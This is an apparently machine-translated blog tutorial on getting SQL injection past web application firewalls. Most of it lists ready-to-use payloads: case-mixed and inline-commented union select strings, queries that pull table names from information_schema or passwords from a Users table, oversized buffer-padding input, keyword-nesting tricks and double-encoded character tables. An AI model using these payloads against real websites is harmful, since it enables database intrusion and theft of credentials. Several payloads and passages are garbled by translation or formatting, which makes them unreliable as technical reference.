Refer to recruitment and removal: common methods to continue SQL Injection by bypassing WAF

Web Hacker is always in constant struggle with WAF, vendors are constantly filtering, and Hacker is constantly bypassing. WAF bypass is an eternal topic, and many friends have summarized many strange tricks. So today I am going to make a small literacy program. Let's talk about WAF bypass.

WAF is a Web application firewall that filters malicious requests and keywords. WAF is just a tool that helps you protect your website. However, if your code is especially scum-free, don't say WAF won't help you, and even wefgod won't help you... Therefore, you cannot naively think that using WAF will not attack your website. Start question --

1> annotator

I believe many of my friends know the SQL annotator, which is the most widely used around WAF. They allow us to bypass many Web application firewalls and restrictions. We can comment out some SQL statements and let them only execute attack statements for intrusion purposes.

Common annotator:

//, -- , /**/, #, --+, -- -, ;%00

2> changes

However, in some open-source programs previously audited, some vendors are not rigorous in filtering, some are blacklisted, but some are only in lower case, however, when passing parameters, the received parameters are not converted to lowercase for matching. In this case, we can easily bypass it.

For example, its filter statement is:

/union\sselect/g

Then we can construct it like this:

id=1+UnIoN/**/SeLeCT

3> inline comments

Some WAF filter keywords are like/union \ sselect/g. As mentioned above, I often use inline annotations. More complex examples require more advanced methods. For example, if the SQL keyword is added, we need to further separate the two words to bypass this filter.

id=1/*!UnIoN*/SeLeCT

Use /*! Code */to execute our SQL statement. Inline annotations can be used in the entire SQL statement. Therefore, if table_name or information_schema is filtered, we can add more inline comments.

For example, a filter is filtered out:

union,where, table_name, table_schema, =, and information_schema

These are the goals that we need to bypass inline annotations. Therefore, inline annotations are usually used for bypass as follows:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -

In general, the above Code can bypass the filter. Please note that we use Like instead of =

When everything seems to have failed, you can use the application firewall to disable the variables used in SQL statements:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- -

Even if common inline comments do not work, the above Code should be able to bypass the union + select filter.

4> buffer overflow:

Unexpected input:

We know that many WAFS are in C language, and they can easily overflow when loading a pile of data. The following describes a WAF that receives malicious requests and responses from a large amount of data.

Id = 1 and (select 1) = (Select 0 xaaaaaaaaaaaaaaaaaaa 1000 more A's) + UnIoN + SeLeCT +, version (), database (), user (), 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 -- +

The above bypass statement was used in a recent website bypass.

5> replace keywords (preg_replace and/or can achieve the same purpose ):

Sometimes the program will delete all the keywords. For example, if there is a filter, it will change union select to blank. In this case, we can bypass it in the following way:

id=1+UNIunionON+SeLselectECT+1,2,3–

It's not hard to understand, right? Union and select become blank, and the two sides are combined to form a new query.

UNION+SELECT+1,2,3--

6> Character encoding:

In some cases, WAF decodes the input in the application, but some WAF only filters and decodes the input once, so we can bypass the bypass Statement by double encoding. (WAF decodes and filters the SQL statement, and the subsequent SQL statement is automatically decoded and executed directly ~)

Example of a double-encoding bypass statement:

id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

Examples of double encoding:

Single quotes :'
% U0027
% U02b9
% U02bc
% U02c8
% U2032
% Uff07
% C0 % 27
% C0 % a7
% E0 % 80% a7
Blank:
% U0020
% Uff00
% C0 % 20
% C0 % a0
% E0 % 80% a0
Left parentheses (:
% U0028
% Uff08
% C0 % 28
% C0 % a8
% E0 % 80% a8
Parentheses ):
% U0029
% Uff09
% C0 % 29
% C0 % a9
% E0 % 80% a9

7> comprehensive:

After several simple WAF requests are bypassed, the subsequent tasks become easier ~ The following describes several methods to bypass your target WAF.

7a> split the SQL statement:

The common practice is to split the SQL Injection statement to check which keyword is filtered out. For example, if you input the union + select statement, you will be notified of a 403 or internal server error, and what union is illegal or something, you will know what is filtered out, it is also a common Fuzzing test. This is the premise for creating bypass statements.

7b> lengthy error:

When your SQL syntax is incorrectly entered and the recipient's website does not close the error echo, a lot of errors will pop up, and the sensitive website root directory address will pop up in php. Aspx then displays detailed information about the entire syntax error.

For example, the input syntax is:

id=1+Select+1,2,3--

The following error is reported:

Error at line 1 near " "+1,2,3--

As mentioned above, blacklist filtering can also be performed in the following ways:

sel%0bect+1,2,3

This is only one of the many methods. Bypassing different WAF requires different bypass ideas.

8> advanced bypass skills:

As mentioned above, when you try to bypass several WAF, you will find it difficult and interesting and challenging: B, when you find yourself being WAF during injection, don't give up and try to challenge it to see what it filters, what syntaxes are allowed, and what syntaxes are not allowed. Of course, you can also try to use it as inflatable doll, [;:{} () * & $/| <>? "'] These special characters in brackets are not hidden ~ I'm very proud to be able to report a mistake. Cool, are you right?

However, if you have tried N statements and all tm statements are filtered out, the entire person will crash. What should you do? It's easy to open the music player and relax with a little apple. Copy all the items filtered by WAF and analyze them carefully! As the saying goes, there is no difficulty in the world, just afraid of people with heart.

For example, if you find that all the * s are replaced with blank after analysis, it means that you cannot use inline comments, and the union + select statement will return a 403 error, in this case, you should make full use of * to be replaced with a blank space:

id=1+uni*on+sel*ect+1,2,3--+

In this case, * is filtered out, But union + select is retained. This is a common WAF bypass technique. Of course, it is not just union + select, but other syntaxes can be used if they are filtered. Find the replaced keyword, and you can find the bypass method.

Some common bypass:

id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI''On'+'SeL''ECT' <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

Note: In mysql4.0, UNI/**/ON + SEL/**/ECT cannot be used.

Conclusion: The WAF posture depends on the spread of your thinking. I feel that I can find a lot of fun in the Process of WAF bypass, isn't it? For more positions, welcome to pm.

Several books on SQL injection and Web security are recommended:

SQL injection attacks and defense

Hacker attack and defense-Web practice

PHP Security is suitable for PHP developers.

Web Security